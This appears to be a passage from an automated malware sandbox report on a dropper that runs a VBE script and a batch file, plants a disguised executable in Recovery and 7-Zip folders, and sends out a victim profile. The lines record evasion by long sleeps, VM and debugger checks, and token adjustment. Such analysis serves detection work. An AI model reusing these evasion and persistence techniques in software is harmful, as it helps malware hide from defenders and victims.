            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\bridgeportserver\blockServerruntime.exeMemory allocated: 8F0000 memory reserve | memory write watchJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeMemory allocated: 1A4D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeMemory allocated: 960000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeMemory allocated: 1A470000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeMemory allocated: D00000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeMemory allocated: 1A810000 memory reserve | memory write watchJump to behavior
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeMemory allocated: E70000 memory reserve | memory write watch
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeMemory allocated: 1A950000 memory reserve | memory write watch
            Source: C:\bridgeportserver\blockServerruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 3600000
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 600000
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599875
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599766
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599656
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599547
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599437
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599328
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599219
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599108
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599000
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598891
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598781
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598672
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598562
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598453
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598344
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598234
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598125
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598016
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597870
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597719
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597609
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597500
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597242
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597125
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597015
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 596906
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595791
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595668
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595547
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595437
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595327
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595219
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595109
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595000
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594891
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594781
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594672
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594562
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594452
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeWindow / User API: threadDelayed 535Jump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeWindow / User API: threadDelayed 1670Jump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeWindow / User API: threadDelayed 537Jump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeWindow / User API: threadDelayed 359Jump to behavior
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeWindow / User API: threadDelayed 3380
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeWindow / User API: threadDelayed 6266
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-22933
            Source: C:\bridgeportserver\blockServerruntime.exe TID: 7504Thread sleep count: 535 > 30Jump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exe TID: 7504Thread sleep count: 1670 > 30Jump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exe TID: 7472Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 7876Thread sleep count: 537 > 30Jump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 7724Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 7908Thread sleep count: 359 > 30Jump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 7812Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -25825441703193356s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -3600000s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -600000s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -599875s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -599766s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -599656s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -599547s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -599437s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -599328s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -599219s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -599108s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -599000s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -598891s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -598781s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -598672s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -598562s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -598453s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -598344s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -598234s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -598125s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -598016s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -597870s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -597719s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -597609s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -597500s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -597242s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -597125s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -597015s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -596906s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -595791s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -595668s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -595547s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -595437s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -595327s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -595219s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -595109s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -595000s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -594891s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -594781s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -594672s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -594562s >= -30000s
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824Thread sleep time: -594452s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\bridgeportserver\blockServerruntime.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D5A5F4
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D6B8E0
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6DD72 VirtualQuery,GetSystemInfo,0_2_00D6DD72
            Source: C:\bridgeportserver\blockServerruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 3600000
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 600000
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599875
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599766
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599656
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599547
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599437
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599328
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599219
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599108
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 599000
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598891
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598781
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598672
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598562
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598453
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598344
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598234
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598125
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 598016
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597870
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597719
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597609
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597500
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597242
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597125
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 597015
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 596906
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595791
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595668
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595547
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595437
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595327
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595219
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595109
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 595000
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594891
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594781
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594672
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594562
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeThread delayed: delay time: 594452
            Source: blockServerruntime.exe, 00000004.00000002.1745037784.000000001B871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: blockServerruntime.exe, 00000004.00000002.1745121196.000000001B8B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
            Source: wscript.exe, 00000001.00000003.1702148499.0000000003472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2894438858.000000001B860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeAPI call chain: ExitProcess graph end nodegraph_0-23332
            Source: C:\bridgeportserver\blockServerruntime.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D7866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D7866F
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D7753D mov eax, dword ptr fs:[00000030h]0_2_00D7753D
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D7B710 GetProcessHeap,0_2_00D7B710
            Source: C:\bridgeportserver\blockServerruntime.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6F063 SetUnhandledExceptionFilter,0_2_00D6F063
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D6F22B
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D7866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D7866F
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D6EF05
            Source: C:\bridgeportserver\blockServerruntime.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgeportserver\blockServerruntime.exe "C:\bridgeportserver\blockServerruntime.exe"Jump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe" Jump to behavior
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}H;
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
